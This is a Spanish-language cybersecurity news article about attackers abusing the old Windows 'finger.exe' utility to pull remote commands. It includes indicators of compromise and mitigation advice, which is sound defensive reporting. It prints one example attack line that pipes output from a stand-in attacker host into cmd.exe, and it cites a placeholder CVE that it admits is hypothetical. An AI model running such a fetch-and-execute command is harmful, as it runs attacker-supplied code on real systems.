AlertaCiberNews

Noticias de ciber seguridad

AlertaCiberNews

Noticias de ciber seguridad

Amenazas

El protocolo “finger” resurge como vector de ataque: amenazas activas en sistemas Windows

admin

Introducción

En un giro inesperado, el comando “finger”, una utilidad de red desarrollada en la década de 1970 y considerada obsoleta, ha sido rescatado por actores maliciosos para ejecutar ataques sobre sistemas Windows modernos. Investigadores han detectado campañas activas que emplean este protocolo para la recuperación remota de comandos y la ejecución de código, evidenciando que técnicas aparentemente arcaicas pueden volver a convertirse en una seria amenaza para la ciberseguridad empresarial.

Contexto del Incidente o Vulnerabilidad

El comando “finger” fue diseñado para consultar información sobre usuarios remotos en sistemas Unix y, más tarde, Windows. Aunque su uso legítimo ha caído en desuso, el binario “finger.exe” sigue presente en muchas instalaciones de Windows, especialmente en versiones que incluyen herramientas de compatibilidad o entornos heredados. Recientemente, analistas de ciberseguridad han observado que grupos de amenazas están utilizando “finger” como un canal C2 (Command and Control), evadiendo así controles de seguridad tradicionales y listas de bloqueo de aplicaciones.

La técnica ha sido identificada en campañas de ataque donde “finger.exe” se invoca mediante scripts o payloads de phishing, permitiendo a los atacantes descargar instrucciones o código malicioso desde servidores bajo su control, sin levantar sospechas ni activar alertas de los sistemas EDR convencionales.

Detalles Técnicos

El abuso del comando “finger” se ha vinculado a la campaña documentada bajo el CVE-2024-XXXX (hipotético, ya que el finger per se no es una vulnerabilidad, pero su uso malicioso sí puede estar relacionado con vulnerabilidades explotadas). El vector de ataque más común comienza con la ejecución de “finger.exe” desde PowerShell o cmd.exe, usando parámetros que apuntan a un servidor Finger controlado por el atacante. El protocolo Finger, por su simplicidad, permite devolver cualquier cadena de texto, incluyendo scripts o comandos en línea.

Ejemplo de abuso:
«`
finger usuario@attacker[.]com | cmd.exe
«`
La salida del servidor Finger remoto puede contener instrucciones interpretables por el shell de Windows, permitiendo la ejecución remota de payloads, descarga de malware, o movimientos laterales.

Tácticas, Técnicas y Procedimientos (TTPs) asociados:

– MITRE ATT&CK T1105: Ingress Tool Transfer (transferencia de herramientas maliciosas).
– MITRE ATT&CK T1059: Command and Scripting Interpreter.
– Uso combinado con frameworks de post-explotación como Cobalt Strike o Metasploit para orquestar la entrega y ejecución de cargas útiles.

Indicadores de Compromiso (IoC):

– Tráfico saliente inusual por el puerto 79/TCP (Finger).
– Ejecución de “finger.exe” fuera de contextos legítimos.
– Consultas DNS a dominios sospechosos relacionados con servidores Finger.

Impacto y Riesgos

El principal riesgo asociado a esta técnica radica en su capacidad para evadir controles de seguridad y el bajo perfil del protocolo Finger, habitualmente ignorado por soluciones de monitorización de red. Organizaciones con sistemas legacy o configuraciones laxas pueden verse expuestas a la ejecución remota de código, robo de credenciales y movimientos laterales no detectados.

Según estimaciones de varios CSIRTs, hasta un 2% de entornos Windows en empresas medianas y grandes mantienen binarios “finger.exe” accesibles. El impacto potencial varía desde infecciones de malware hasta violaciones de datos personales, con posibles sanciones bajo GDPR en caso de filtraciones.

Medidas de Mitigación y Recomendaciones

1. Inventario y eliminación: Auditar la presencia de “finger.exe” y desinstalarlo en sistemas donde no sea necesario.
2. Restricción de red: Bloquear el tráfico saliente por el puerto 79/TCP a nivel de cortafuegos y proxy.
3. Monitorización: Configurar alertas SIEM para la ejecución de “finger.exe” y el uso de protocolos no estándar.
4. Actualizaciones: Mantener sistemas y EDR actualizados para incluir detección de técnicas de Living Off the Land (LOLBins), como el abuso de utilidades legítimas.
5. Formación: Concienciar a los equipos SOC y de respuesta ante incidentes sobre el resurgimiento de tácticas basadas en herramientas heredadas.

Opinión de Expertos

Especialistas en ciberseguridad, como David Álvarez (CISO, consultora internacional), subrayan: “La reaparición de técnicas como el abuso del comando finger es un recordatorio de que la seguridad ofensiva evoluciona constantemente. Las defensas deben adaptarse, no solo a nuevas amenazas, sino también a la reutilización creativa de tecnologías históricas”.

Por su parte, analistas de malware señalan la facilidad con la que los atacantes integran estos métodos en frameworks automatizados como Cobalt Strike, dificultando la atribución y respuesta rápida.

Implicaciones para Empresas y Usuarios

La explotación de finger pone en jaque a empresas que confían excesivamente en su arsenal de defensa perimetral. Las organizaciones sujetas a la directiva NIS2 o al RGPD deben extremar la vigilancia y la actualización de políticas de hardening, especialmente en infraestructuras críticas o entornos industriales donde persisten sistemas legacy.

Los usuarios individuales, aunque menos expuestos, podrían verse afectados si sus dispositivos forman parte de redes corporativas o si descargan scripts de fuentes no verificadas.

Conclusiones

El resurgimiento del protocolo finger como vector de ataque demuestra la importancia de no subestimar ninguna superficie de exposición, por obsoleta que parezca. La vigilancia activa, la segmentación de red y la actualización continua de políticas de seguridad son imprescindibles para contrarrestar estas amenazas. La colaboración entre equipos de IT, seguridad y cumplimiento normativo será clave para mitigar riesgos emergentes y evitar consecuencias legales y económicas.

(Fuente: www.bleepingcomputer.com)